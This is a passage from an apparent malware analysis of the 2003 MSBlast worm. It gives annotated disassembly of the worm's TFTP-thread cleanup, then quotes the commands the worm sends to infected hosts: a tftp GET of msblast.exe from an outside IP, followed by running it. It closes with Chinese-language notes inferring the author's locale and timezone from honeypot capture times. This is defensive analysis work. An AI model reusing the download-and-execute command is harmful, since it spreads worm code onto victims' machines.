:00401E10 E853050000Call 00402368;KERNEL32.TerminateThread
:00401E15 FF3524314000push dword ptr [00403124]
:00401E1B E8D4030000Call 004021F4;WS2_32.closesocket: the tftp server's UDP socket
:00401E20 83253840400000and dword ptr [00404038], 00000000;clear the "tftp server active" flag
:00401E27 83BDC0EDFFFF00cmp dword ptr [ebp+FFFFEDC0], 00000000
:00401E2E 740Bje 00401E3B
:00401E30 FFB5C0EDFFFFpush dword ptr [ebp+FFFFEDC0]
:00401E36 E8F1040000Call 0040232C;KERNEL32.CloseHandle
:00401E3B 5Fpop edi
:00401E3C 5Epop esi
:00401E3D 5Bpop ebx
:00401E3E C9leave
:00401E3F C3ret
;After connecting to the remote side it sends these commands:
;tftp -i xxx.xxx.xxx.xxx GET msblast.exe
;start msblast.exe
;msblast.exe
;It is unclear why msblast.exe is run twice.
;Files downloaded with tftp are read-only by default.

从GetDateFormat函数的LCID参数是409来看,作者使用的操作系统的区域设置是美国。

从文件编译时间来看,该样本编译于2003年8月11日7点21分;而honeypot上最早捕获到它的时间是北京时间2003年8月11日14点03分。
如果作者和我们在同一个时区,那么蠕虫是在编译后6小时传播到honeypot上的。如果不是,那么作者所在的地方应该在我们西边不超过6个时区的范围内。
